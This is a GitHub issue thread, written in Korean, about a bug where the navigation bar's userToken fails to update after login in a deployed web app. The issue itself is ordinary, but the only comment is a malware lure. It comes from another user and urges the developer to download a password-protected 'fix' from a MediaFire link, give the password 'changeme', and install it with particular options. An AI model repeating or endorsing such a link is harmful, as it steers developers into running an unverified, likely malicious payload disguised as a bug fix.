### ISSUE TITLE
fix: userToken의 비동기 업데이트 로직 추가

### ISSUE THREAD

**Issue by changmin6362** [sprint-team5/dallaem#213]
## 어떤 버그인가요?

> 로그인 api 요청이 실행된 뒤에 gnb가 가져오는 userToken이 업데이트 되지 않아서 발생한 버그

## 어떤 상황에서 발생한 버그인가요?

> 배포 상태에서 처음 접속한 브라우저에서만 로그인할 때 gnb가 실시간으로 조건부렌더링 되지 않는 버그

## 예상 결과

> 예상했던 정상적인 결과가 어떤 것이었는지 설명해주세요

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
